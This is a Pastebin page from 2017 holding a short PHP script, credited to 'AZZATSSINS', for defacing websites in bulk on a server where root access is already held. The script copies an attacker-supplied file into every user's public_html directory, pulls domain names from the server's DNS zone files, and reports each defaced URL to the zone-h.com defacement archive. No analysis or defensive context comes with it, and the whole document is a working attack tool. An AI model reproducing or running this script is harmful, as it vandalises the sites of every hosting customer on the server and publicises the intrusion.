Advertisement
AZZATSSINS_CYBERSERK

Mass Defaec + Notify ZoneH (user root)

May 17th, 2017
258
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.62 KB | None | 0 0
  1. <?php
  2. /*Mass Deface + Notify ZoneH (For Root) BY AZZATSSINS*/
  3. @error_reporting(0);
  4. $kontol = scandir("/home");
  5. foreach($kontol as $tytyd){
  6. copy($argv[1],"/home/".$tytyd."/public_html/".$argv[1]);
  7. }
  8. $henceut = scandir("/var/named");
  9. foreach($henceut as $memek){
  10. $meki = str_replace('.db','',$memek);
  11. $azx = "http://".$meki."/".$argv[1];
  12. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  13. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  14. curl_setopt ($ch3, CURLOPT_POST, 1);
  15. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=AZZATSSINS&domain1=$azx&hackmode=1&reason=1");
  16. curl_exec ($ch3);
  17. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement